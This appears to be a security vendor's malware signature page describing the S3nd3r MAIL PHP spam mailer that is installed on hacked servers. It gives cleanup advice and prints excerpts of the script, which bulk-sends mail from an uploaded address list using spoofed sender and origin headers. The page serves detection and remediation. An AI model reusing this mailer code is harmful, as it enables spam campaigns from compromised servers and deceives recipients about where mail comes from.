Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.hacktool.mailer-s3nd3r.001

php.hacktool.mailer-s3nd3r.001

Mailers is a category of scripts that hackers install on compromised servers to send out spam and anonymous emails.
They take advantage of the servers' bandwidth and other resourses to send out tons of spam emails in a short time. Moreover, headers of such emails don't contain traces of the hackers - they lead to the hacked server -
so all the spam campaign remains quite anonymous. Hacked servers is not a scarse resourse and spammers don't care much if one of them gets blacklisted for spamming they can easily move to another server. However, to minimize risks of
blacklisting, they usually evenly distribute mailing between several hacked servers.
"S3nd3r MAIL" is a simple spam script that allows to send emails to a list of recepients that can be provived in a file. It also has a basic verification to prevent strangers from using this script.

Affecting

Any servers with enabled PHP';
$cleanup='Delete the mailer script and scan your server for other types of malware and specifically for backdoors. Make sure to identy and close the security hole.
You also need to check if your server IP address got blacklisted by various anti-spam blacklist providers as a result of hacker activity.
You can also sign up with us and let our team remove the malware for you.

Dump

...excerpts..
...

:::::::::::::::::::::::::::::::::::::::::::::
..::S3nd3r MAIL::..
:::::::::::::::::::::::::::::::::::::::::::::
<!--
Developed by : M4R3CH4L-CMD
Contact : <---(M4R3CH4L-CMD@hotmail.com.br)-->

<html>
<head>
<title> - xxxsendxxx -</title>

...

//Verifica se os dados foram preenchidos
$teste = $_POST['teste'];
If ($teste == null){exit (/*"<br><center><b>Preenche corretamente os campos</b></center>"*/);}

//Recupera os dados do FORM
$FromName = $_POST['NRemetente'];
$FromMail = $_POST['ERemetente'];
$Subject = $_POST['Assunto'];
$MailServer = explode("@",$FromMail,2); $MailServer = $MailServer['1'];
$arq_temp = $_FILES["emails"]["tmp_name"];
$Lista = (file($arq_temp));
$QtdMail = count($Lista);
$Conteudo = stripslashes($_POST['Conteudo']);
$IntervalX = $_POST['Interval'];

//Arquivos de configuracao
@ini_set("sendmail_from", $FromMail);
@ini_set("time_limit",0);

//Define os headers do email
$headers = "From: $FromName <$FromMail>n";
$headers .= "MIME-Version: 1.0n";
$headers .= "Content-type: text/html; charset=iso-8859-1n";
$headers .= "Content-Transfer-encoding: 8bitn";
$headers .= "Reply-To: $FromName <$FromMail>n";
$headers .= "Return-Path: $FromMailn";
$headers .= "Message-ID: <".md5(uniqid(time()))."@$MailServer>n";
$headers .= "X-Priority: 3n";
$headers .= "X-MSmail-Priority: Highn";
//$headers .= "X-Mailer: Microsoft Office Outlook, Build 11.0.5510n";
//$headers .= "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441n";
$headers .= "X-Mailer: iGMail [www.ig.com.br]n";
$headers .= "X-Originating-Email: [$FromName]n";
$headers .= "X-Sender: $FromNamen";
$headers .= "X-Originating-IP: [201.201.120.121]n";
$headers .= "X-iGspam-global: Unsure, spamicity=0.570081 - pe=5.74e-01 - pf=0.574081 - pg=0.574081n";

//Inicia o envio imundos
If ($QtdMail != 1){
echo str_repeat("-",126) . "<br>";
echo "<B>Estando tudo preparado vamos comecar o envio</B><br>";
echo "<B>De:</B> $FromName <$FromMail><br>";
echo "<B>Assunto:</B> $Subject<br>";
echo "<B>Para Lista:</B> $arq_temp <B>Que contem:</B> $QtdMail <B>e-mails</B><br>";
echo "<B>Com intervalo de:</B> $IntervalX <B>segundos entre cada envio</B><br>";
echo str_repeat("-",126) . "<br>";
} else {exit;}

$error = 0;
$donen = 0;

while (list($pos, $val) = each($Lista)) {
$val = trim($val);
if( mail($val, $Subject, $Conteudo, $headers) ){
$donen++;
echo '<font color="#0033FF" size="2" face="Verdana, Arial, Helvetica, sans-serif">OK - Enviado para [' . $val . '] - { ' . $donen . ' Ok | ' . $error . ' Erro } - [ ' . ($pos+1) . ' de ' . $QtdMail . ' ]</font><br>';
}
else{
$error++;
echo '<font color="#FF0000" size="2" face="Verdana, Arial, Helvetica, sans-serif">ERRO - Nao Enviado para [' . $val . '] - { ' . $donen . ' Ok | ' . $error . ' Erro } - [ ' . ($pos+1) . ' de ' . $QtdMail . ' ]</font><br>';
}

sleep($IntervalX);
}
...